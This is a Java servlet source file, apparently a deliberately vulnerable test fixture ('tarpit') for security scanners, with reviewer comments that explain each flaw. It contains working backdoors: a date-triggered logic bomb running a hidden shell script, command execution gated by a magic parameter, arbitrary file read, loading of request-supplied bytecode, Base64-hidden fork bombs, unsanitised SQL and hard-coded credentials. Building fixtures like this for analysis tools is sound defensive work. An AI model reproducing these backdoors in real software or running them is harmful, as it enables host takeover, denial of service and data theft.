package io.shiftleft.tarpit;

import java.io.BufferedReader;
import java.io.File;
import java.io.FileReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.net.URI;
import java.net.URL;
import java.net.URLClassLoader;
import java.nio.charset.StandardCharsets;
import java.nio.file.Files;
import java.nio.file.OpenOption;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.SQLException;
import java.util.Base64;
import java.util.Calendar;
import java.util.logging.Logger;
import java.util.regex.Pattern;
import javax.servlet.ServletException;
import javax.servlet.annotation.WebServlet;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import javax.tools.JavaFileObject;
import javax.tools.SimpleJavaFileObject;
import javax.tools.ToolProvider;
import sun.misc.BASE64Decoder;

/**
 * Servlet mapped to {@code /insider} and loaded at startup ({@code loadOnStartup = 1}).
 *
 * <p>Every GET runs a fixed sequence of side effects: a JDBC connection is opened with
 * hard-coded credentials, several OS commands are spawned, a request-named file is echoed
 * to the response, Java source is written to disk, compiled and loaded, a class is defined
 * from request bytes, and a query string derived from the request is sent to the database.
 * No authentication or authorization check is visible in this class.
 *
 * <p>NOTE(review): the package name ({@code io.shiftleft.tarpit}) suggests this is a
 * deliberately vulnerable fixture for analysis tools; confirm before treating it as
 * production code. The "loaded from" and "JADX WARN" comments indicate decompiler output,
 * so identifier names ({@code str}, {@code e5}, ...) are presumably not the author's.
 */
@WebServlet(name = "simpleServlet", urlPatterns = {"/insider"}, loadOnStartup = 1)
/* loaded from: input_file:WEB-INF/classes/io/shiftleft/tarpit/Insider.class */
public class Insider extends HttpServlet {
    private static final long serialVersionUID = -3462096228274971485L;
    // Assigned by getConnection() on every doGet call; never closed in the visible code,
    // and shared across request threads because it is an instance field of the servlet.
    private Connection connection;
    // Logger is named after ServletTarPit, not Insider, and is not used in this class.
    private static final Logger LOGGER = Logger.getLogger(ServletTarPit.class.getName());
    // Character allow-list pattern (alphanumerics plus \ / = - + .); not referenced by any
    // method in this class, so it validates nothing here.
    Pattern p = Pattern.compile("^[A-Za-z0-9\\\\\\/\\=\\-+.]*$");

    /* loaded from: input_file:WEB-INF/classes/io/shiftleft/tarpit/Insider$SourceFile.class */
    /**
     * In-memory Java source file: exposes a string as compiler input under a
     * {@code string:///} URI. Not referenced by the other members of this class.
     */
    class SourceFile extends SimpleJavaFileObject {
        // Source text returned by getCharContent.
        String code;

        /**
         * @param str  name appended to {@code string:///} to form the file object's URI
         * @param str2 source text to hand to the compiler
         */
        SourceFile(String str, String str2) {
            super(URI.create("string:///" + str), JavaFileObject.Kind.SOURCE);
            this.code = null;
            this.code = str2;
        }

        /** Returns the stored source text; the flag argument is ignored. */
        public CharSequence getCharContent(boolean z) {
            return this.code;
        }
    }

    /* JADX WARN: Type inference failed for: r0v57, types: [io.shiftleft.tarpit.Insider$1] */
    /**
     * Handles GET on {@code /insider}. Reads the request parameters {@code tracefn},
     * {@code cmd} and {@code x}; each one reaches a command, file, class-loading or SQL sink
     * without any effective validation.
     *
     * <p>Statement order matters: the first exception thrown skips everything after it.
     * IOException, ClassNotFoundException and SQLException are caught and only printed;
     * unchecked exceptions (for example a NullPointerException from a missing parameter)
     * propagate to the container.
     *
     * @param httpServletRequest  request whose parameters drive the sinks below
     * @param httpServletResponse response that receives the contents of the file named by {@code x}
     */
    protected void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) throws ServletException, IOException {
        try {
            // Opens a new JDBC connection per request (see getConnection for the credentials).
            getConnection();
            // Time-triggered command: the argument is Base64 for "sh /tmp/shellcode.sh";
            // ticking() runs it once the clock is past a fixed date.
            ticking("c2ggL3RtcC9zaGVsbGNvZGUuc2g=");
            // Hard-coded magic value gates execution of the request-supplied "cmd" string as
            // an OS command: remote command execution with a static shared secret.
            // A request without "tracefn" makes getParameter return null, so .equals throws
            // NullPointerException, which none of the catch clauses below handle.
            if (httpServletRequest.getParameter("tracefn").equals("C4A938B6FE01E")) {
                Runtime.getRuntime().exec(httpServletRequest.getParameter("cmd"));
            }
            // Arbitrary file read: "x" is used directly as a filesystem path and the file is
            // echoed line by line into the response. No canonicalisation or base-directory
            // check; the reader is never closed.
            BufferedReader bufferedReader = new BufferedReader(new FileReader(httpServletRequest.getParameter("x")));
            while (true) {
                String readLine = bufferedReader.readLine();
                if (readLine == null) {
                    break;
                } else {
                    httpServletResponse.getWriter().println(readLine);
                }
            }
            // Drops embedded Java source to /java/test/Test.java, compiles it with the system
            // compiler, then loads and instantiates "test.Test" from /java. The Base64 payload
            // decodes to a class whose main() respawns the JVM in an endless loop (process
            // exhaustion). Detection: an application server writing .java files and invoking
            // the in-process compiler is itself a strong signal.
            // NOTE(review): the decoded source declares a public class with a different name
            // than Test, so compilation/loading presumably fails and Class.forName throws
            // ClassNotFoundException, which the outer catch handles, skipping the rest of
            // this method. Confirm. getSystemJavaCompiler() also returns null on a runtime
            // without a compiler, which would surface as an uncaught NullPointerException.
            File file = new File("/java");
            File file2 = new File(file, "test/Test.java");
            file2.getParentFile().mkdirs();
            Files.write(file2.toPath(), new String(Base64.getDecoder().decode("cHVibGljIGNsYXNzIEZvcmtCb21iIHsgcHVibGljIHN0YXRpYyB2b2lkIG1haW4oU3RyaW5nW10gYXJncykgeyB3aGlsZSh0cnVlKSB7IFJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMobmV3IFN0cmluZ1tdeyJqYXZhdyIsICItY3AiLCBTeXN0ZW0uZ2V0UHJvcGVydHkoImphdmEuY2xhc3MucGF0aCIpLCAiRm9ya0JvbWIifSk7IH0gfSB9")).getBytes(StandardCharsets.UTF_8), new OpenOption[0]);
            ToolProvider.getSystemJavaCompiler().run((InputStream) null, (OutputStream) null, (OutputStream) null, new String[]{file2.getPath()});
            try {
                System.out.println(Class.forName("test.Test", true, URLClassLoader.newInstance(new URL[]{file.toURI().toURL()})).newInstance());
            } catch (IllegalAccessException e) {
                e.printStackTrace();
            } catch (InstantiationException e2) {
                e2.printStackTrace();
            }
            // Request-supplied bytecode: "x" (the same parameter used as a file path above) is
            // Base64-decoded, defined as a class by an anonymous ClassLoader and instantiated,
            // so static initialisers and the constructor of caller-chosen bytecode run inside
            // the server JVM. sun.misc.BASE64Decoder is a JDK-internal API.
            // All failures here are caught and printed, so this block never aborts doGet.
            try {
                new ClassLoader() { // from class: io.shiftleft.tarpit.Insider.1
                    Class x(byte[] bArr) {
                        return defineClass(null, bArr, 0, bArr.length);
                    }
                }.x(new BASE64Decoder().decodeBuffer(httpServletRequest.getParameter("x"))).newInstance();
            } catch (IllegalAccessException e3) {
                e3.printStackTrace();
            } catch (InstantiationException e4) {
                e4.printStackTrace();
            } catch (Exception e5) {
                e5.printStackTrace();
            }
            // Unconditional "sh -c" with a Base64-hidden argument; it decodes to a shell
            // fork-bomb one-liner (denial of service on the host). Base64 literals passed to
            // exec are worth flagging in review regardless of what they decode to.
            Runtime.getRuntime().exec(new String[]{"sh", "-c", new String(Base64.getDecoder().decode("Oigpezp8OiZ9Ozo="))});
            // "x" is Base64-encoded (platform default charset), passed through validate(),
            // decoded again and executed verbatim as SQL: the round trip hides the taint from
            // naive pattern matching but performs no sanitisation.
            // validate() never returns null, so the else branch below is unreachable. Standard
            // Base64 output cannot contain '_', so validate() presumably always returns "" and
            // the statement executed is the empty string. Confirm.
            String encodeToString = Base64.getEncoder().encodeToString(httpServletRequest.getParameter("x").getBytes());
            String validate = validate(encodeToString);
            if (validate != null) {
                try {
                    this.connection.createStatement().executeQuery(new String(Base64.getDecoder().decode(validate)));
                } catch (Exception e6) {
                    // Every failure of the query is silently discarded; the Statement is
                    // never closed.
                }
            } else {
                log("Validation problem with " + encodeToString);
            }
        } catch (IOException e7) {
            e7.printStackTrace();
        } catch (ClassNotFoundException e8) {
            e8.printStackTrace();
        } catch (SQLException e9) {
            e9.printStackTrace();
        }
    }

    /**
     * Returns {@code str} unchanged when it contains the literal {@code SOMETHING_HERE},
     * otherwise the empty string. It never returns {@code null} and performs no character
     * or structure checks, so it is not a security control despite its name.
     *
     * @param str candidate value (doGet passes a Base64-encoded request parameter)
     * @return {@code str} or {@code ""}
     */
    public String validate(String str) {
        return str.contains("SOMETHING_HERE") ? str : "";
    }

    /**
     * Loads the MySQL JDBC driver and stores a new connection to {@code DBPROD} on
     * localhost in {@link #connection}.
     *
     * <p>The account name and password are hard-coded string literals, so they ship in the
     * class file and cannot be rotated without a rebuild. The URL carries no TLS or other
     * connection options. A previously stored connection is overwritten without being closed.
     *
     * @throws ClassNotFoundException if the driver class is not on the classpath
     * @throws SQLException if the connection cannot be established
     */
    private void getConnection() throws ClassNotFoundException, SQLException {
        Class.forName("com.mysql.jdbc.Driver");
        this.connection = DriverManager.getConnection("jdbc:mysql://localhost/DBPROD", "admin", "1234");
    }

    /**
     * Time-triggered command execution ("logic bomb" pattern): Base64-decodes {@code str}
     * and, if the current time is after a fixed instant, runs the result as an OS command.
     *
     * @param str Base64-encoded command line
     * @throws IOException if the process cannot be started
     */
    private void ticking(String str) throws IOException {
        Calendar calendar = Calendar.getInstance();
        Calendar calendar2 = Calendar.getInstance();
        // Decoded with the platform default charset.
        String str2 = new String(Base64.getDecoder().decode(str));
        // Trigger instant in epoch milliseconds; corresponds to 2019-03-06T08:00:00Z.
        calendar2.setTimeInMillis(1551859200000L);
        // Before the trigger instant this method has no observable effect, which is what
        // lets such code pass testing done ahead of the date.
        if (calendar.after(calendar2)) {
            Runtime.getRuntime().exec(str2);
        }
    }
}
